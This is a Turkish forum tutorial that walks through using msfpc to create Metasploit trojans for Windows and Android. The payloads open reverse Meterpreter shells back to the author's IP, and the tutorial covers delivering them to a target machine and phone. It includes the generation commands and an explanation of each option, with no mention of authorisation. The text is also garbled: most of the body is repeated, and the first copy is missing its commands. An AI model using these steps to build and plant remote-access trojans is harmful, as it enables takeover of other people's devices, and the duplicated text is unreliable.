Selamın aleyküm arkadaşlar. Ben AdaletinKILICI. Bu yazımızda sizlerle beraber msfpc aracının ne olduğuna ve nasıl kullanıldığına değineceğiz. İsterseniz hemen başlayalım. Serinin önceki yazılarına ulaşmak için;
1- MSF Serisi #1 M3tâsploit
2- MSF Serisi #2 Msfcli gibi Msfconsole
linklerini kullanabilirsiniz. Şimdi konumuza geçelim.
Msfpc Nedir?
Msfpc aracını kısaca msfvenom aracının kolaylaştırılmış hali olarak tanımlayabiliriz. Peki msfvenom aracı nedir diyeceksiniz Msfvenom aracı çeşitli platformlar için trojanlar oluşturmamıza yarayan bir araçtır. Bu serinin sonraki yazılarında da onun için bir yazı gelecek
Msfpc aracı sayesinde neredeyse hiç uğraşmadan payloadlar sayesinde trojan oluşturabilir ve onu dinlemeye alabiliriz. Şimdi isterseniz çeşitli platformlar için nasıl trojan oluşturulduğuna ve bunun nasıl kullanıldığına bakalım.
Msfpc Temel Kullanım
Terminale
yazarsak msfpc aracının temel kullanımını görebiliriz.
Resimde de gördüğünüz gibi birçok platform için trojan oluşturmayı desteklemektedir. Temel kullanımına gelirsek;
Port değerini girmezsek manuel olarak 443. portu ayarlayacaktır. IP girmezsek de bizden bir ağ kartı seçmemizi isteyecektir. İsterseniz deneyelim.
Ben burada wlan0'yu seçeceğim. Çünkü wifi ağıma bağlı diğer bir cihaz üzerinde trojan denemesi yapacağım. Sizin de gördüğünüz gibi ip girmediğimiz için böyle bir seçim ekranı geldi. Şimdi de ip girerek deneyelim. Burada unutmamanız gereken şey gireceğiniz ip'nin hedef ip değil kendi ip'niz olmasıdır.
Evet gördüğünüz gibi ip sormadı ama portu 443. port olarak otomatik girdi. Bunu engellemek için de ip yanına port yazıyoruz.
Temel olarak kullanımı öğrendik. Şimdi de diğer ayarları ve anlamlarını öğrenelim.
Diğer ayarlara bakacak olursak şöyle sıralayabiliriz.
CMD: Shell oturumu açmamızı sağlar.
MSF: Meterpreter oturumu oluşturur.
Eğer bu değerlerden birini girmezsek otomatik olarak MSF girilecektir.
BIND: Sisteme bind bağlantı yapmayı sağlar.
REVERSE: Sistem ile ters bağlantı kurmayı sağlar.
Default değeri reverse'dir.
STAGED: Payloadı parçalara bölerek küçültür. Msfconsole aracına bağlıdır.
STAGELESS: Herhangi bir bağımlılığı yoktur. STAGED'den daha stabildir.
Default değeri STAGED'dir
TCP/HTTP/HTTPS/FIND_PORT: Bağlantı türünü seçmemize yarar.
Default değeri TCP'dir.
BATCH: Olası bütün payloadları oluşturur. Yani HTTP için ayrı TCP için ayrı...
LOOP sadece belirtilen tür için payload oluşturur.
Default olarak LOOP'tur.
VERBOSE: Payload oluşturulurken daha fazla bilgi getirir.
Default olarak etkin değildir.
Şimdi bu ayarları da öğrendikten sonra sizlerle beraber birkaç platform için uygulama yapalım.
Windows Örnek Uygulama
İlk olarak kullanımını öğrendiğimiz şekilde default ayarlarda bir payload oluşturalım.
Daha sonra resimde de gördüğünüz gibi bu payloadı dinlemeye almak için bize bir komut verdi. Bu komutu terminalde çalıştıralım.
Eğer resimde gördüğünüz gibi bir hata ile karşılaşırsanız o dosyayı açın ve "run -j" kısmındaki -j parametresini silin. Böylelikle çalışacaktır.
Şimdi payloadımızı karşı bilgisayara atıyoruz ve çalıştırıyoruz.
Artık meterpreter oturumuna sahibiz
Android Örnek Uygulama
Şimdi de
komutunu kullanarak bir android payload oluşturuyoruz.
Daha sonra dinlemeye alırken hata almamak için "run -j" deki -j parametresini siliyoruz. Ve verilen komutu çalıştırıyoruz.
Telefon üzerinden programı çalıştırdığımızda ise
oturumu elde ettiğimizi görürüz
Bitiş
Evet arkadaşlar bugünki konumuz da bu kadardı. Temel olarak msfpc aracının kullanımını öğrendiyseniz diğer platformlar için de payloadlar üretip kullanabilirsiniz. Bi sonraki yazımızda görüşmek üzere. Sağlıcakla kalın...
1- MSF Serisi #1 M3tâsploit
2- MSF Serisi #2 Msfcli gibi Msfconsole
linklerini kullanabilirsiniz. Şimdi konumuza geçelim.
Msfpc Nedir?
Msfpc aracını kısaca msfvenom aracının kolaylaştırılmış hali olarak tanımlayabiliriz. Peki msfvenom aracı nedir diyeceksiniz Msfvenom aracı çeşitli platformlar için trojanlar oluşturmamıza yarayan bir araçtır. Bu serinin sonraki yazılarında da onun için bir yazı gelecek
Msfpc aracı sayesinde neredeyse hiç uğraşmadan payloadlar sayesinde trojan oluşturabilir ve onu dinlemeye alabiliriz. Şimdi isterseniz çeşitli platformlar için nasıl trojan oluşturulduğuna ve bunun nasıl kullanıldığına bakalım.
Msfpc Temel Kullanım
Terminale
Kod:
msfpc -h
Resimde de gördüğünüz gibi birçok platform için trojan oluşturmayı desteklemektedir. Temel kullanımına gelirsek;
Kod:
msfpc <TYPE> <IP> <PORT> <DİĞER AYARLAR>
Ben burada wlan0'yu seçeceğim. Çünkü wifi ağıma bağlı diğer bir cihaz üzerinde trojan denemesi yapacağım. Sizin de gördüğünüz gibi ip girmediğimiz için böyle bir seçim ekranı geldi. Şimdi de ip girerek deneyelim. Burada unutmamanız gereken şey gireceğiniz ip'nin hedef ip değil kendi ip'niz olmasıdır.
Evet gördüğünüz gibi ip sormadı ama portu 443. port olarak otomatik girdi. Bunu engellemek için de ip yanına port yazıyoruz.
Temel olarak kullanımı öğrendik. Şimdi de diğer ayarları ve anlamlarını öğrenelim.
Diğer ayarlara bakacak olursak şöyle sıralayabiliriz.
Kod:
<CMD/MSF> <BIND/REVERSE> <STAGED/STAGELESS> <TCP/HTTP/HTTPS/FIND_PORT> <BATCH/LOOP> <VERBOSE>
MSF: Meterpreter oturumu oluşturur.
Eğer bu değerlerden birini girmezsek otomatik olarak MSF girilecektir.
BIND: Sisteme bind bağlantı yapmayı sağlar.
REVERSE: Sistem ile ters bağlantı kurmayı sağlar.
Default değeri reverse'dir.
STAGED: Payloadı parçalara bölerek küçültür. Msfconsole aracına bağlıdır.
STAGELESS: Herhangi bir bağımlılığı yoktur. STAGED'den daha stabildir.
Default değeri STAGED'dir
TCP/HTTP/HTTPS/FIND_PORT: Bağlantı türünü seçmemize yarar.
Default değeri TCP'dir.
BATCH: Olası bütün payloadları oluşturur. Yani HTTP için ayrı TCP için ayrı...
LOOP sadece belirtilen tür için payload oluşturur.
Default olarak LOOP'tur.
VERBOSE: Payload oluşturulurken daha fazla bilgi getirir.
Default olarak etkin değildir.
Şimdi bu ayarları da öğrendikten sonra sizlerle beraber birkaç platform için uygulama yapalım.
Windows Örnek Uygulama
İlk olarak kullanımını öğrendiğimiz şekilde default ayarlarda bir payload oluşturalım.
Kod:
msfpc windows 192.168.43.151 1453
Eğer resimde gördüğünüz gibi bir hata ile karşılaşırsanız o dosyayı açın ve "run -j" kısmındaki -j parametresini silin. Böylelikle çalışacaktır.
Şimdi payloadımızı karşı bilgisayara atıyoruz ve çalıştırıyoruz.
Artık meterpreter oturumuna sahibiz
Android Örnek Uygulama
Şimdi de
Kod:
msfpc apk 192.168.43.151 1453
Daha sonra dinlemeye alırken hata almamak için "run -j" deki -j parametresini siliyoruz. Ve verilen komutu çalıştırıyoruz.
Telefon üzerinden programı çalıştırdığımızda ise
oturumu elde ettiğimizi görürüz
Bitiş
Evet arkadaşlar bugünki konumuz da bu kadardı. Temel olarak msfpc aracının kullanımını öğrendiyseniz diğer platformlar için de payloadlar üretip kullanabilirsiniz. Bi sonraki yazımızda görüşmek üzere. Sağlıcakla kalın...
Son düzenleme: